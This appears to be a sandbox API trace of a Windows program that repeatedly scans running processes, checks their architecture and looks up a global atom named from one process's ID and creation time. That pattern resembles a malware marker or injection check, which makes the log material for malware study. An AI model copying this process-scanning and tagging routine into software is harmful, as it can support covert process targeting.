	[0101.691] CloseHandle (hObject=0x574) returned 1
	[0101.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x574
	[0101.691] IsWow64Process (in: hProcess=0x574, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.691] CloseHandle (hObject=0x574) returned 1
	[0101.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0101.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0101.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0101.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0101.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0101.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0101.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0101.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0101.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0101.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0101.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0101.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0101.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0101.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0101.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0101.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0101.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0101.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0101.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x5e0
	[0101.773] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.773] CloseHandle (hObject=0x5e0) returned 1
	[0101.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0101.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0101.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x5e0
	[0101.773] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.773] CloseHandle (hObject=0x5e0) returned 1
	[0101.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0101.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x5e0
	[0101.773] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.773] CloseHandle (hObject=0x5e0) returned 1
	[0101.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x5e0
	[0101.774] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.774] CloseHandle (hObject=0x5e0) returned 1
	[0101.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x5e0
	[0101.774] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.774] CloseHandle (hObject=0x5e0) returned 1
	[0101.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x5e0
	[0101.774] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.774] CloseHandle (hObject=0x5e0) returned 1
	[0101.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x5e0
	[0101.774] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.774] CloseHandle (hObject=0x5e0) returned 1
	[0101.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x5e0
	[0101.774] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.775] CloseHandle (hObject=0x5e0) returned 1
	[0101.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0101.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x5e0
	[0101.775] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.775] CloseHandle (hObject=0x5e0) returned 1
	[0101.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x5e0
	[0101.775] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.775] CloseHandle (hObject=0x5e0) returned 1
	[0101.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x5e0
	[0101.775] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.775] CloseHandle (hObject=0x5e0) returned 1
	[0101.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x5e0
	[0101.775] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.775] CloseHandle (hObject=0x5e0) returned 1
	[0101.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x5e0
	[0101.776] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.776] CloseHandle (hObject=0x5e0) returned 1
	[0101.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x5e0
	[0101.776] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.776] CloseHandle (hObject=0x5e0) returned 1
	[0101.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x5e0
	[0101.776] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.776] CloseHandle (hObject=0x5e0) returned 1
	[0101.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x5e0
	[0101.776] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.776] CloseHandle (hObject=0x5e0) returned 1
	[0101.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x5e0
	[0101.777] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.777] CloseHandle (hObject=0x5e0) returned 1
	[0101.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x5e0
	[0101.777] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.777] CloseHandle (hObject=0x5e0) returned 1
	[0101.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x5e0
	[0101.777] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.777] CloseHandle (hObject=0x5e0) returned 1
	[0101.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x5e0
	[0101.777] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.777] CloseHandle (hObject=0x5e0) returned 1
	[0101.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x5e0
	[0101.777] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.777] CloseHandle (hObject=0x5e0) returned 1
	[0101.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x5e0
	[0101.778] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.778] CloseHandle (hObject=0x5e0) returned 1
	[0101.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x5e0
	[0101.778] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.778] CloseHandle (hObject=0x5e0) returned 1
	[0101.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x5e0
	[0101.778] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.778] CloseHandle (hObject=0x5e0) returned 1
	[0101.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x5e0
	[0101.778] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.778] CloseHandle (hObject=0x5e0) returned 1
	[0101.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x5e0
	[0101.778] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.778] CloseHandle (hObject=0x5e0) returned 1
	[0101.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x5e0
	[0101.779] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.779] CloseHandle (hObject=0x5e0) returned 1
	[0101.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x5e0
	[0101.779] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.779] CloseHandle (hObject=0x5e0) returned 1
	[0101.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x5e0
	[0101.779] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.779] CloseHandle (hObject=0x5e0) returned 1
	[0101.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x5e0
	[0101.779] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.779] CloseHandle (hObject=0x5e0) returned 1
	[0101.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x5e0
	[0101.779] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.779] CloseHandle (hObject=0x5e0) returned 1
	[0101.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x5e0
	[0101.780] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0101.780] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0101.780] GetProcessTimes (in: hProcess=0x5e0, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0101.780] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0101.780] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0101.781] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0101.781] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0101.781] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0101.781] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0101.781] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0101.781] CloseHandle (hObject=0x5e0) returned 1
	[0101.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0101.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x5e0
	[0101.781] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.781] CloseHandle (hObject=0x5e0) returned 1
	[0101.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x5e0
	[0101.782] IsWow64Process (in: hProcess=0x5e0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.782] CloseHandle (hObject=0x5e0) returned 1
	[0101.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0101.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0101.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0101.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0101.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0101.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0101.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0101.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0101.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0101.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0101.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0101.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0101.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0101.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0101.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0101.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0101.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0101.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0101.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x678
	[0101.859] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.860] CloseHandle (hObject=0x678) returned 1
	[0101.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0101.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0101.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x678
	[0101.860] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.860] CloseHandle (hObject=0x678) returned 1
	[0101.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0101.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x678
	[0101.860] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.860] CloseHandle (hObject=0x678) returned 1
	[0101.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x678
	[0101.861] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.861] CloseHandle (hObject=0x678) returned 1
	[0101.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x678
	[0101.861] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.861] CloseHandle (hObject=0x678) returned 1
	[0101.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x678
	[0101.861] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.861] CloseHandle (hObject=0x678) returned 1
	[0101.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x678
	[0101.861] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.861] CloseHandle (hObject=0x678) returned 1
	[0101.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x678
	[0101.861] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.861] CloseHandle (hObject=0x678) returned 1
	[0101.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0101.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x678
	[0101.862] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.862] CloseHandle (hObject=0x678) returned 1
	[0101.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x678
	[0101.862] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.862] CloseHandle (hObject=0x678) returned 1
	[0101.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x678
	[0101.862] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.862] CloseHandle (hObject=0x678) returned 1
	[0101.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x678
	[0101.862] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.862] CloseHandle (hObject=0x678) returned 1
	[0101.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x678
	[0101.862] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.863] CloseHandle (hObject=0x678) returned 1
	[0101.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x678
	[0101.863] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.863] CloseHandle (hObject=0x678) returned 1
	[0101.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x678
	[0101.863] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.863] CloseHandle (hObject=0x678) returned 1
	[0101.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x678
	[0101.863] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.863] CloseHandle (hObject=0x678) returned 1
	[0101.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x678
	[0101.863] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.864] CloseHandle (hObject=0x678) returned 1
	[0101.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x678
	[0101.864] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.864] CloseHandle (hObject=0x678) returned 1
	[0101.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x678
	[0101.864] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.864] CloseHandle (hObject=0x678) returned 1
	[0101.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x678
	[0101.865] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.865] CloseHandle (hObject=0x678) returned 1
	[0101.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x678
	[0101.865] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.865] CloseHandle (hObject=0x678) returned 1
	[0101.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x678
	[0101.865] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.865] CloseHandle (hObject=0x678) returned 1
	[0101.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x678
	[0101.865] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.865] CloseHandle (hObject=0x678) returned 1
	[0101.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x678
	[0101.865] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.865] CloseHandle (hObject=0x678) returned 1
	[0101.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x678
	[0101.866] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.866] CloseHandle (hObject=0x678) returned 1
	[0101.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x678
	[0101.866] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.866] CloseHandle (hObject=0x678) returned 1
	[0101.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x678
	[0101.866] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.866] CloseHandle (hObject=0x678) returned 1
	[0101.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x678
	[0101.866] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.866] CloseHandle (hObject=0x678) returned 1
	[0101.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x678
	[0101.866] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.866] CloseHandle (hObject=0x678) returned 1
	[0101.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x678
	[0101.867] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.867] CloseHandle (hObject=0x678) returned 1
	[0101.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x678
	[0101.867] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.867] CloseHandle (hObject=0x678) returned 1
	[0101.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x678
	[0101.868] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0101.868] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0101.868] GetProcessTimes (in: hProcess=0x678, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0101.868] wsprintfA (in: param_1=0x39937e0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0101.868] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0101.868] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0101.869] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0101.869] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0101.869] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0101.869] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0101.869] CloseHandle (hObject=0x678) returned 1
	[0101.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0101.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x678
	[0101.869] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.869] CloseHandle (hObject=0x678) returned 1
	[0101.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x678
	[0101.869] IsWow64Process (in: hProcess=0x678, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.869] CloseHandle (hObject=0x678) returned 1
	[0101.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0101.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0101.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0101.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0101.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0101.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0101.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0101.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0101.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0101.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0101.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0101.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0101.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0101.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0101.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0101.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0101.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
